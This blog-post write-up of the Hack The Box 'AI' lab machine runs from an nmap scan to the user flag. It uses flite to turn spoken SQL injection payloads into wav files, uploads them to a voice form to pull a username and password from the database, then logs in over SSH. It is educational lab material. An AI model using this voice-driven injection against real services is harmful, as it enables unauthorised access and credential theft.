Hack The Box AI Machine Writeup – 10.10.10.163

Hello, here is the writeup of Hack The Box AI new active machine. As usual I’m going to add IP 10.10.10.163 to etc/hosts as ai.htb for easiness.

Initial NAMP Scanning

➜  ai nmap -T4 -A -v ai.htb      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 20:04 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Initiating Ping Scan at 20:04
Scanning ai.htb (10.10.10.163) [4 ports]
Completed Ping Scan at 20:04, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:04
Scanning ai.htb (10.10.10.163) [1000 ports]
Discovered open port 22/tcp on 10.10.10.163
Discovered open port 80/tcp on 10.10.10.163
Increasing send delay for 10.10.10.163 from 0 to 5 due to 290 out of 724 dropped probes since last increase.
Completed SYN Stealth Scan at 20:04, 9.04s elapsed (1000 total ports)
Initiating Service scan at 20:04
Scanning 2 services on ai.htb (10.10.10.163)
Completed Service scan at 20:04, 6.37s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against ai.htb (10.10.10.163)
Retrying OS detection (try #2) against ai.htb (10.10.10.163)
Retrying OS detection (try #3) against ai.htb (10.10.10.163)
Retrying OS detection (try #4) against ai.htb (10.10.10.163)
Retrying OS detection (try #5) against ai.htb (10.10.10.163)
Initiating Traceroute at 20:04
Completed Traceroute at 20:04, 0.20s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:04
Completed Parallel DNS resolution of 2 hosts. at 20:04, 0.77s elapsed
NSE: Script scanning 10.10.10.163.
Initiating NSE at 20:04
Completed NSE at 20:04, 6.17s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.67s elapsed
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/11%OT=22%CT=1%CU=43569%PV=Y%DS=2%DC=T%G=Y%TM=5DC994
OS:BB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Uptime guess: 25.597 days (since Thu Oct 17 05:45:15 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   199.36 ms 10.10.14.1
2   167.95 ms ai.htb (10.10.10.163)

NSE: Script Post-scanning.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds
           Raw packets sent: 1779 (82.330KB) | Rcvd: 1162 (74.241KB)

The namp scan revealed couple of ports open, 80 an websrver and 22 an SSH port. Lets investigate the port 80 first.

Port 80 has a web server that hosts a website called “Artificial Intelligence”, there are 4 links, Home, About, AI and Contact. The About has a small introduction that says “Our developers working 24/7 to make it happen and we progressed well with audio conversion.”

AI has file upoload page, which is interesting, the contact page hasmachine maker MrR3boot’s fake email id.

If you have root the machine Player, you should have come across the same situation. That machine as well as has the same scenario of uploading wav file to upload and get the information from the vulnerable database. This AI machine is almost similar to it.

Lets exploit it

Getting User.txt

I’m going to use Flite to create a wav file and upload it using the upload form and get the credentials from the database. My command would be;

  ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, username from users comment database"

Above command will create a wav file called nav1n.wav, I’m going to upload it using the upload form.

Well, I have the username “Alexa” now.

Lests modify the commad to get the password for the user Alexa.

➜  ai flite -voice rms -o nav1n.wav -t "open single quote space and 1 = 2 union select, password from users comment database"

AsI already have the credentials, lets try if the SSH works.

➜  ai ssh alexa@ai.htb
alexa@ai.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.3.7-050307-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 11 17:49:45 UTC 2019

  System load:  0.06               Processes:           149
  Usage of /:   28.2% of 19.56GB   Users logged in:     0
  Memory usage: 27%                IP address for eth0: 10.10.10.163
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

63 packages can be updated.
15 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Nov 11 17:01:16 2019 from 10.10.14.35
alexa@AI:~$ 

Yesss, it works. Lets see if I can find user.txt

Last login: Mon Nov 11 17:01:16 2019 from 10.10.14.35
alexa@AI:~$ ls
user.txt
alexa@AI:~$ cat user.txt
c43b62[-----------]da55e4b
alexa@AI:~$ 

That’s it for today.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Dover, Ben
10 months ago

you have really long nights at your place πŸ™‚

Sorry, that action is blocked.